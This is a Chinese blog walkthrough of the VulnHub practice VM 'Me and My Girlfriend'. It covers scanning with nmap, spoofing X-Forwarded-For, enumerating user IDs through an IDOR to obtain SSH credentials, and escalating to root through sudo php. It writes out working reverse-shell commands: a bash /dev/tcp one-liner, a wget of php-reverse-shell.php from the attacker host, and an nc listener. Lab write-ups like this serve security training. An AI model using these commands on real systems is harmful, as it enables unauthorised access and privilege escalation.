vulnhub : Me and My Girlfriend

free_ahhh

已于 2023-04-04 15:09:31 修改

阅读量294

点赞数

分类专栏：靶场文章标签：网络安全系统安全 web安全

于 2023-01-15 03:14:07 首次发布

本文链接：https://blog.csdn.net/weixin_45112649/article/details/128606741

版权

靶场专栏收录该内容

1 篇文章 0 订阅

订阅专栏

vulnhub : Me and My Girlfriend

练习+加深记忆固编写此文章。因为自身基础不够会在练习的过程中将不熟悉的东西查资料，并附在超链接中。

参考文章：
vulnhub靶机练习-Me and My Girlfriend: 1
Linux php命令
 反弹shell详解
工具使用：
nmap
searchsploit

部署

虚拟机：vmware workstation
攻击者：WSL kali （WSL可以通过nat技术使用物理机的ip 攻击靶场。也可以使用kali Linux虚机进行攻击，但是记得配置网卡）
文件：Me-and-My-Girlfriend-1.ova
工具：burpsuit

靶场下载
2. 加载下载下来文件即可
3. 配置网卡，开机，如图：（这里我的攻击机为wsl kali ，因此不用配置其他的，如果使用kali虚拟机的话也需要进行如下配置；当然网卡也有其他配置方式，这里我就不赘述了，有需要的自行百度）

收集信息-查找靶机ip-及开放端口

物理机上查看以太网适配器 VMware Network Adapter VMnet8 的ip段，命令：ipconfig。
nmap扫描192.168.98.0/24网段ip，扫描出靶机ip为192.168.98.204

nmap -sP 192.168.98.0/24

在这里插入图片描述
或者也可以使用 netdiscover -r 192.168.98.1/24，但是我扫描失败了，不知道是不是wsl的问题。
3. 探测靶机开放端口，当前开放了22（ssh）、80（http）。

 nmap -p 1-65535 -sS 192.168.98.204

在这里插入图片描述

访问网站，XFF配置

1.访问网站，提示仅可以本地访问。HTTP数据包中标记来源的字段有x-forwarded-for、x-real-ip。
通常这类字段应用场景为：访问者（1.1.1.1）-》代理（x-forwarded-for:1.1.1.1）-》目标网站（192.168.x.x），当代理将互联网的流量转发给私网时，网络层的源ip被替换成了代理的ip，真实ip就由http暂为保管了
在这里插入图片描述 2. burpsuit抓包添加数据报头x-forwarded-for:127.0.0.1，注意最好添加在Connection: close之前，不然可能会失效。之后访问的每一个页面都需要添加该字段，可以搞一个火狐插件，或者对burpsuit进行配置

x-forwarded-for:127.0.0.1

在这里插入图片描述 3. burpsuit配置

网站测试-漏洞探测-目录扫描

1.观察网站，
（1）是否存在爆破点、注入点、文件包含等。
（2）目录扫描
（3）一定要看看网页源码！！！
简单测试网站是否存在注入点、文件包含漏洞。
可能存在文件包含的地方
![![在这里插入图片描述](https://img-blog.csdnimg.cn/ed55145a95354f109d832a214169f797.pn](https://img-blog.csdnimg.cn/7653a74d23fa43ca8770899b8f8ad322.png
可能存在注入点的地方

2. 目录扫描，试了一下，没有发现啥有用信息

网站测试-越权访问

简要测试，发现user-id 存在越权访问的现象。
2. 使用burpsuit把所有数据爬出来
抓包将数据包发送到intruder里，对user_id进行爆破

3. 看看都有哪些账户
4. 发现故事主人公alice。获得用户名:alice 密码:4lic3

SSH 登录

1.在kali中使用alice 4lic3 ssh登录靶机

ssh alice@192.168.98.204

在这里插入图片描述

操作系统信息搜集-获取第一个flag

获取第一个flag，获知第二个flag在/root目录下

ls -al 
ls .my_secre
cat .my_secret/flag1.txt

在这里插入图片描述 2.搜集操作系统信息，当前权限不足需要搜集当前信息。（searchsploit使用）

id #查看当前用户权限。
cat /etc/passwd |grep alice #查看当前用户权限，权限第
uname -a #查看当前系统版本，可以依据系统版本，查找响应漏洞进行提权
	#使用kali中searchsploit查找对应漏洞，尝试提权。此处不是标准答案，不做演示
	searchsploit ubuntu 14.04
	searchsploit linux Kernel 4.4.0
sudo -l #查看当前用户可以执行哪些管理员权限命令

在这里插入图片描述

系统提权-获取第二个flag

上图 (root) NOPASSWD: /usr/bin/php 表示当前用户可以执行管理员权限下的Linux php命令，在管理员权限运行PHP代码反弹shell，可以获取管理员权限的账号。（也可以反弹当前账户权限至msf提权，不知道能不能成功，有时间试一下）

（1）# kali上设置监听

nc -lvp 1080

（2） sudo php 反弹shell，方法有二
方法一：上传Linux自带的反弹shell脚本
#php 反弹shell的两种方法
方法一：自己写代码反弹shell，试过报错了，原因未知，待排查。

sudo php -r 'system("bash -i >&/dev/tcp/192.168.98.1/1080>&1");'

emmm,如果php能够执行系统命令的话？？就可以直接获取flag2了

 sudo php -r 'system("ls /root");'
sudo php -r 'system("cat /root/flag2.txt");'

在这里插入图片描述

#方法二：使用kali自带反弹shell脚本php-reverse-shell.php，kali本地利用python开启http服务。靶机访问并下载反弹shell脚本，修改脚本中的ip及port

#kali
cd /usr/share/webshells/php/
ls
python3 -m http.server 2323
#靶机
cd /tmp
wget http://192.168.98.1:2323/php-reverse-shell.php
vim php-reverse-shell.php #修改ip为192.168.98.1 port为1080 
sudo php php-reverse-shell.php #运行反弹shell脚本

在这里插入图片描述
2.获取第二个flag

wsl kali端口监听问题

wsl使用nat技术，借用宿主机各网卡上的ip访问对应网络，这意味着靶机无法反向连接wsl kali，因此需要宿主机做端口转发来解决这个问题。详细代码如下：

# 宿主机以管理员身份运行 powershell
#端口映射，关闭宿主机防火墙或者在墙上加策略放行监听端口。
netsh interface portproxy add v4tov4 listenport=[宿主机 端口] listenaddress=0.0.0.0 connectport=[wsl-kali port] connectaddress=[wsl-kali ip]
#取消端口映射
netsh interface portproxy delete v4tov4 listenaddress=本机ip listenport=本机端口号
#查看本电脑映射 
netsh interface portproxy show all
#映射完成以后，要验证一下物理机上的端口有没有在监听，如果没有就排错吧。
netstat -ano | findstr [port]